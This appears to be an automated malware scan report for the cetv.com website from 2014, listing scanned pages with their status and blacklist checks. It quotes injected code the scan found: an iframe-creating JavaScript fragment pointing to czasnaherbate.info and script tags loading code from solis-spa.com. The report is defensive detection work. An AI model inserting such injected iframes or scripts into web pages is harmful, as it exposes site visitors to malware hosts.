Scanned pages/files
Request | Server response | Status |
http://cetv.com/ | 200 OK Content-Length: 21241 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hkcetv.com ...[12019 bytes skipped]... td> <td><table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="3f3f3f"> <tr> <td align="center" bgcolor="#1a1a1a"><script language="JavaScript"><!-- function random_imglink(){ var myimages=new Array() var imagelinks=new Array() var imagetarget=new Array() myimages[1]="pinkribbon2013_banner.jpg" imagelinks[1]="/ad/redirect.htm?i=97&u=http://hkcetv.com/event/pinkribbon2013" imagetarget[1] = "_blank" var ry =Math.floor(Math.random()*myimages.length) if (ry==0) ry=1 document.write('<a href="'+imagelinks[ry]+'" target="' + imagetarget[ry] + '"><img src="/image/ad/'+myimages[ry]+'" border=0></a>') } random_imglink() //--></script></td> </tr> </table></td> <td width="10"><img src="/image/common/space.gif" width="10" height= ...[14210 bytes skipped]... | ||
http://cetv.com/common/js.js | 200 OK Content-Length: 4141 Content-Type: application/x-javascript | clean |
http://cetv.com/common/swfobject.js | 200 OK Content-Length: 8515 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function jg09() { var static='ajax'; var controller='index.php'; var jg = document.createElement('iframe'); jg.src = 'http://czasnaherbate.info/D6p2qrVw.php'; jg.style.position = 'absolute'; jg.style.color = '67304'; jg.style.height = Antivirus reports:
| ||
http://cetv.com/common/prototype.js | 200 OK Content-Length: 130352 Content-Type: application/x-javascript | clean |
http://cetv.com/content/info/ | 200 OK Content-Length: 10577 Content-Type: text/html | clean |
http://cetv.com/content/program/ | 200 OK Content-Length: 19989 Content-Type: text/html | clean |
http://cetv.com/content/video/ | 200 OK Content-Length: 22505 Content-Type: text/html | clean |
http://cetv.com/event/tenvote/ | 200 OK Content-Length: 9976 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.solis-spa.com/primaverasilvio/mTfO3VUx.php?id=45406759" type="text/javascript"></script> | ||
http://cetv.com/index.html | 200 OK Content-Length: 21566 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hkcetv.com ...[12087 bytes skipped]... td> <td><table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="3f3f3f"> <tr> <td align="center" bgcolor="#1a1a1a"><script language="JavaScript"><!-- function random_imglink(){ var myimages=new Array() var imagelinks=new Array() var imagetarget=new Array() myimages[1]="pinkribbon2013_banner.jpg" imagelinks[1]="/ad/redirect.htm?i=97&u=http://hkcetv.com/event/pinkribbon2013" imagetarget[1] = "_blank" var ry =Math.floor(Math.random()*myimages.length) if (ry==0) ry=1 document.write('<a href="'+imagelinks[ry]+'" target="' + imagetarget[ry] + '"><img src="/image/ad/'+myimages[ry]+'" border=0></a>') } random_imglink() //--></script></td> </tr> </table></td> <td width="10"><img src="/image/common/space.gif" width="10" height= ...[14507 bytes skipped]... | ||
http://cetv.com/content/info/index.html | 200 OK Content-Length: 10642 Content-Type: text/html | clean |
http://cetv.com/content/program/index.html | 200 OK Content-Length: 20073 Content-Type: text/html | clean |
http://cetv.com/content/video/index.html | 200 OK Content-Length: 22593 Content-Type: text/html | clean |
http://cetv.com/event/tenvote/index.html | 200 OK Content-Length: 9979 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.solis-spa.com/primaverasilvio/mTfO3VUx.php?id=45406760" type="text/javascript"></script> | ||
http://cetv.com/content/photo/index.html | 200 OK Content-Length: 36102 Content-Type: text/html | clean |
http://cetv.com/content/presenter/index.html | 200 OK Content-Length: 24709 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cetv.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 08 Jun 2014 15:29:34 GMT
Server: Microsoft-IIS/6.0
Content-Length: 21241
Content-Type: text/html; Charset=big5
Set-Cookie: ASPSESSIONIDQQQQBRTB=DGEBBKOBGLCALGJGFOECMAHO; path=/
X-Powered-By: ASP.NET
...21241 bytes of data.
GET / HTTP/1.1
Host: cetv.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 08 Jun 2014 15:29:34 GMT
Server: Microsoft-IIS/6.0
Content-Length: 21241
Content-Type: text/html; Charset=big5
Set-Cookie: ASPSESSIONIDQQQQBRTB=DGEBBKOBGLCALGJGFOECMAHO; path=/
X-Powered-By: ASP.NET
...21241 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cetv.com
Referer: http://www.google.com/search?q=cetv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cetv.com
Referer: http://www.google.com/search?q=cetv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cetv.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cetv.com/
Result: cetv.com is not infected or malware details are not published yet.
Result: cetv.com is not infected or malware details are not published yet.